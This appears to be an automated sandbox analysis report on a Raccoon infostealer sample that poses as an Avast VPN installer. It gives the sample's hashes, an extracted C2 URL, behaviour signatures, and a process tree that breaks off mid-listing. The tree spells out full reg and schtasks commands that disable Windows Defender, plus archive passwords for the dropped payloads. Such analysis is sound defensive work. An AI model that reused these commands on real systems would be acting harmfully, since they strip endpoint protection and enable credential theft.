Analysis

  • max time kernel
    119s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    25-03-2022 23:17

General

  • Target

    369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.exe

  • Size

    16.3MB

  • MD5

    3d15320984eaa8f6e04b0ff5b5df1e6c

  • SHA1

    bc9dae6bc1f6908ae5c1ca1525a026103ba5825b

  • SHA256

    369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316

  • SHA512

    3dadb99c5222843069b1b287001be2097b86efd40182cb3131df63926b9e7c53235c80133853be0ec71793e4d82d41337658125013a481b88faf7cc51c85d16a

Malware Config

Extracted

Family

raccoon

Version

1.7.1-hotfix

Botnet

5eaa41b3101d5537f786a35da1878f0d1d760e53

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

c763e433ef51ff4b6c545800e4ba3b3b1a2ea077

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 2 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 6 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 34 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 29 IoCs
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.exe
    "C:\Users\Admin\AppData\Local\Temp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Users\Admin\AppData\Local\Temp\is-LPLU4.tmp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-LPLU4.tmp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.tmp" /SL5="$70054,16368734,778240,C:\Users\Admin\AppData\Local\Temp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2392
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\44xUGQ\MMF.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\44xUGQ\DisableOAVProtection.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3392
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            5⤵
              PID:4544
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              5⤵
                PID:4320
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                5⤵
                  PID:3200
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  5⤵
                    PID:4764
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    5⤵
                      PID:216
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      5⤵
                        PID:2848
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        5⤵
                          PID:2228
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          5⤵
                            PID:3136
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:3688
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:1168
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:3976
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:956
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                    5⤵
                                      PID:872
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      5⤵
                                        PID:3560
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:4976
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                          5⤵
                                            PID:3804
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            5⤵
                                              PID:2532
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              5⤵
                                                PID:3344
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                5⤵
                                                  PID:3572
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  5⤵
                                                    PID:1168
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                    5⤵
                                                      PID:4312
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                      5⤵
                                                        PID:3724
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                        5⤵
                                                          PID:2196
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                          5⤵
                                                            PID:1984
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                            5⤵
                                                              PID:2152
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                              5⤵
                                                                PID:3868
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                5⤵
                                                                  PID:1304
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                  5⤵
                                                                    PID:5052
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                    5⤵
                                                                      PID:3964
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                      5⤵
                                                                        PID:2632
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                        • Modifies security service
                                                                        PID:1744
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                          PID:812
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\44xUGQ\main.bat" "
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1624
                                                                        • C:\Windows\SysWOW64\mode.com
                                                                          mode 65,10
                                                                          5⤵
                                                                            PID:1332
                                                                          • C:\ProgramData\44xUGQ\7z.exe
                                                                            7z.exe e file.zip -p___________23294pwd8589pwd29032___________ -oextracted
                                                                            5⤵
                                                                              PID:3888
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_10.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1644
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_9.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:696
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_8.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4924
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_7.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2580
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_6.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:956
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_5.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4488
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_4.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2788
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_3.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:1260
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_2.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:4068
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_1.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:4796
                                                                            • C:\ProgramData\44xUGQ\xmhost.exe
                                                                              "xmhost.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Loads dropped DLL
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1196
                                                                              • C:\ProgramData\44xUGQ\xmhost.exe
                                                                                "C:\ProgramData\44xUGQ\xmhost.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:1632
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 484
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:4716
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\ProgramData\44xUGQ\DiskRemoval.bat" "
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:648
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /T 60 /NOBREAK
                                                                              5⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:4668
                                                                        • C:\Program Files (x86)\avastvpn.exe
                                                                          "C:\Program Files (x86)\avastvpn.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3584
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-PMBFM.tmp\avastvpn.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-PMBFM.tmp\avastvpn.tmp" /SL5="$10214,8012383,778240,C:\Program Files (x86)\avastvpn.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Checks computer location settings
                                                                            • Loads dropped DLL
                                                                            • Drops file in Program Files directory
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:4652
                                                                            • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                              "C:\Program Files (x86)\avast_secureline_setup.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Writes to the Master Boot Record (MBR)
                                                                              PID:4768
                                                                              • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus.exe
                                                                                C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus.exe /icarus-info-path:C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\icarus-info.xml /install
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Writes to the Master Boot Record (MBR)
                                                                                • Checks processor information in registry
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2448
                                                                                • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus_ui.exe
                                                                                  C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\common\icarus_ui.exe /er_master:master_ep_e1e5a84f-ffaa-4def-a20b-b21ad8aed9fa /er_ui:ui_ep_10f26d71-1621-4772-bfa8-05f37d3002c5
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks processor information in registry
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:2520
                                                                                • C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\avast-vpn\icarus.exe
                                                                                  C:\Windows\Temp\asw-563a661f-3e3f-44b0-a2d7-39e6d2b7f974\avast-vpn\icarus.exe /er_master:master_ep_e1e5a84f-ffaa-4def-a20b-b21ad8aed9fa /er_ui:ui_ep_10f26d71-1621-4772-bfa8-05f37d3002c5 /er_slave:avast-vpn_slave_ep_674d5a66-2336-4f09-886c-4c6013168ec4 /slave:avast-vpn
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Writes to the Master Boot Record (MBR)
                                                                                  • Checks processor information in registry
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2404
                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\ProgramData\xOUvu\MMF.vbs"
                                                                              5⤵
                                                                              • Checks computer location settings
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3852
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\ProgramData\xOUvu\DisableOAVProtection.bat" "
                                                                                6⤵
                                                                                  PID:3284
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                    7⤵
                                                                                      PID:4200
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                      7⤵
                                                                                        PID:3716
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                        7⤵
                                                                                          PID:3304
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                          7⤵
                                                                                            PID:1640
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                            7⤵
                                                                                              PID:3988
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                              7⤵
                                                                                                PID:4536
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                7⤵
                                                                                                  PID:4660
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                  7⤵
                                                                                                    PID:3216
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                    7⤵
                                                                                                      PID:3652
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                      7⤵
                                                                                                        PID:4116
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                        7⤵
                                                                                                          PID:3952
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                          7⤵
                                                                                                            PID:1384
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                                                            7⤵
                                                                                                              PID:2164
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                              7⤵
                                                                                                                PID:2728
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1720
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                7⤵
                                                                                                                  PID:1640
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                  7⤵
                                                                                                                    PID:3596
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                    7⤵
                                                                                                                      PID:1524
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                      7⤵
                                                                                                                        PID:4532
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                        7⤵
                                                                                                                          PID:4544
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                                                          7⤵
                                                                                                                            PID:228
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                                                            7⤵
                                                                                                                              PID:3344
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                                                              7⤵
                                                                                                                                PID:3664
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                7⤵
                                                                                                                                  PID:3168
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                  7⤵
                                                                                                                                    PID:3332
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                    7⤵
                                                                                                                                      PID:3572
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      7⤵
                                                                                                                                        PID:3328
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        7⤵
                                                                                                                                          PID:4784
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                          7⤵
                                                                                                                                            PID:412
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            7⤵
                                                                                                                                              PID:388
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              7⤵
                                                                                                                                              • Modifies security service
                                                                                                                                              PID:3680
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              7⤵
                                                                                                                                                PID:2164
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\ProgramData\xOUvu\main.bat" "
                                                                                                                                              6⤵
                                                                                                                                                PID:3616
                                                                                                                                                • C:\Windows\SysWOW64\mode.com
                                                                                                                                                  mode 65,10
                                                                                                                                                  7⤵
                                                                                                                                                    PID:4112
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e file.zip -p___________12659pwd5006pwd7116___________ -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:1060
                                                                                                                                                  • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                    7z.exe e extracted/file_11.zip -oextracted
                                                                                                                                                    7⤵
                                                                                                                                                      PID:1720
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_10.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:4484
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_9.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:4948
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_8.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:404
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:1068
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:4968
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:3888
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:1868
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:3580
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:4828
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
